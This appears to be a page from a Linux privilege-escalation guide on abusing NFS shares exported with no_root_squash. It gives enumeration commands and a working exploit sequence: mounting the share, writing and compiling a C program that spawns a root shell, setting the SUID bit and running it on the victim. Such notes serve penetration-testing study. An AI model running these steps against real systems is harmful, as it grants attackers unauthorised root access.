NFS Root Squashing

no_root_sqush

Background Knowlege: no_root_squash

Q: What is NFS?

A: Network File System (NFS) is an UDP-based RPC service. It allows remote hosts to mount file systems over a network and interact with those file systems as though they are mounted locally.

Q: What is root squash?

A: Root squash is a special mapping that maps remote root user (uid 0) to local "nobody" user (uid 65534), which has minimal privileges.

Q: What is no_root_squash?

In the /etc/exports file, if some directory is configured as no_root_squash, then a remote root user will be mapped to local root user.

Q: How is this related to privesc?

Suppose we are the root user on our attack machine. We can mount this target directory on our attack machine and write to this directory as the root user on the victim machine. The attack plan is:

  1. Mount the target directory locally

  2. Create a privesc exploit as SUID binary in the local directory

  3. Execute this privesc exploit on the victim machine

When we create the privesc exploit locally, this exploit will be created on the victim machine as a root-owned SUID binary simultaneously through NFS. Then we can execute this privesc exploit on the victim machine and get a root shell.

Enumeration

Examine /etc/exports:

cat /etc/exports

Suppose /tmp has the no_root_squash option turned on, then the victim machine is vulnerable to NFS root squashing:

On our attack machine, we can verify that the remote /tmp directory is mountable:

showmount -e <remote_ip>

Exploitation

Create a temporary directory on our attack machine.

mkdir /tmp/1

Mount the target directory.

mount -o rw,vers=2 <remote_ip>:<target_directory> /tmp/1

Prepare the privesc source code x.c.

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c

Compile the source code.

gcc /tmp/1/x.c -o /tmp/1/x

Turn on the SUID bit.

chmod +s /tmp/1/x

Trigger the payload on the victim machine.

/tmp/x
PreviousCron JobsNextDocker

Last updated